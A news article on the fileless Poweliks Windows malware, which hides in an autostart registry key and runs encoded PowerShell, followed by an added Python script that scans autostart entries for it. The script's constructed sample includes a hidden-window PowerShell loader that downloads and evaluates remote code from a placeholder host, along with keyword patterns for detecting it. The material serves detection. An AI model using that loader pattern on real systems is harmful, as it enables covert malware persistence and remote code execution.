Late last week, researcher Paul Rascagneres announced the discovery of a new strain of Windows malware in his blog on GData.com, one that requires no installation on the part of the user and can operate entirely out of the registry while evading detection by many of the most popular anti-virus programs on the market today.
Delivered through standard email phishing channels, the virus arrives in a malicious Microsoft Word document that plants a hidden autostart registry key.
Once that foothold is in place, the malware can create and execute custom shellcode along with a Windows binary that works its way into the deeper layers of the operating system, undisturbed by the classical threat-detection methods available to the wider consumer market.
Rascagneres goes into specific detail about how an affected computer is infected from the inside out, and warns that if a solution is not found soon, we may see this particular strain spread much faster and farther than any that’s come before it.
“PowerShell runs the encoded script containing the malware’s executable code (which is also a .DLL) responsible for downloading other malicious files onto the infected system. This technique is done as part of its evasion tactic since it will not be directly executed by Windows or any application.”
It’s the malware’s ability to run without any prior installation that makes it uniquely devious, and that has Rascagneres most concerned. Dubbed the “Poweliks” virus after the TROJ_POWELIKS code found within the file itself, it has many researchers worried that it could spread far more widely than most, owing to its unusual path of entry and its nearly undetectable presence once it has found its way onto an unsuspecting user’s machine.
“Attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a computer], even after a system re-boot.”
No one has yet come forward with details that might shed light on where the malware originated, though Rascagneres believes it could have been the concerted effort of several prominent hacking circles, judging by the fresh attack vector and the advanced nature of the code contained within the virus itself.
Unfortunately, he could not offer any protective steps worth mentioning, given the uncommon way the virus launches on a computer. However, he also believes it won’t be long before AV companies build a detection path capable of stopping these types of attacks before they have a chance to do serious damage to the average user’s machine.
“To prevent attacks like this, anti-virus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reaches the customer’s email inbox.”
Until then, the best option available is for IT admins to perform regular memory analysis sweeps to catch the bug while it’s still alive in a system’s registry, and to be extra cautious of any Word documents that are downloaded through email until a more concrete solution can be found, patched, and distributed to the internet at large.
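The article describes an autostart registry value that launches PowerShell with an encoded script, and ends by recommending that admins sweep systems for it. The script below is an added example, not code from the article, from Rascagneres or from G Data. It decodes a `-EncodedCommand` argument (powershell.exe takes Base64 of a UTF-16LE script, and accepts abbreviations such as `-enc`) and flags autostart entries that launch PowerShell, hide its window, or whose decoded script fetches or evaluates further code. The entries in `SAMPLE_ENTRIES` are constructed, the URL in them is a placeholder, and the check for non-printable value names is a general hygiene heuristic of mine, not something the article states. On a real host the tuples would be filled from an export of the Run/RunOnce keys (for example the output of `reg query`).

```python
"""Flag autostart (Run/RunOnce) registry values that look like a registry-resident
PowerShell loader. Added example; all sample data below is constructed."""
import base64
import re
from typing import Optional

# Constructed loader script and its -EncodedCommand form (Base64 of UTF-16LE).
LOADER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED_ARG = base64.b64encode(LOADER_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed autostart entries: (registry key, value name, value data).
# Entry 2 imitates the behaviour the article describes; the others are ordinary.
SAMPLE_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "\x01updater",
     "powershell.exe -NoProfile -WindowStyle hidden -enc " + ENCODED_ARG),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
]

# -EncodedCommand and its accepted abbreviations, followed by a Base64 blob.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Script fragments that pull in or evaluate more code at run time.
DOWNLOAD_TOKENS = ("downloadstring", "downloadfile", "invoke-expression",
                   "iex", "webclient", "frombase64string")


def decode_encoded_command(data: str) -> Optional[str]:
    """Return the script hidden in a -EncodedCommand argument, or None if absent."""
    m = ENC_FLAG.search(data)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # not valid Base64 after all
        return None
    return raw.decode("utf-16-le", errors="replace")


def assess_entry(key: str, name: str, data: str) -> dict:
    """Collect human-readable findings for one autostart value."""
    findings = []
    lowered = data.lower()
    if any(not ch.isprintable() for ch in name):  # heuristic, not from the article
        findings.append("value name contains non-printable characters")
    if "powershell" in lowered:
        findings.append("autostart value launches PowerShell")
    if HIDDEN_WINDOW.search(data):
        findings.append("PowerShell window hidden")
    decoded = decode_encoded_command(data)
    if decoded is not None:
        findings.append("encoded PowerShell command")
        hits = sorted(t for t in DOWNLOAD_TOKENS if t in decoded.lower())
        if hits:
            findings.append("decoded script fetches/evaluates code: " + ", ".join(hits))
    return {"key": key, "name": name, "findings": findings, "decoded": decoded}


def scan(entries):
    """Return only the entries that produced at least one finding."""
    return [r for r in (assess_entry(*e) for e in entries) if r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_ENTRIES):
        print(f"{hit['key']}\\{hit['name']!r}")
        for f in hit["findings"]:
            print("  -", f)
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

Run against the constructed sample, only the second entry is reported, with the decoded download-and-evaluate script shown beside the findings. Decoding the argument rather than merely matching on `powershell` is what lets the check see what the script actually does; a plain string match would miss a loader that avoids the word in its value name.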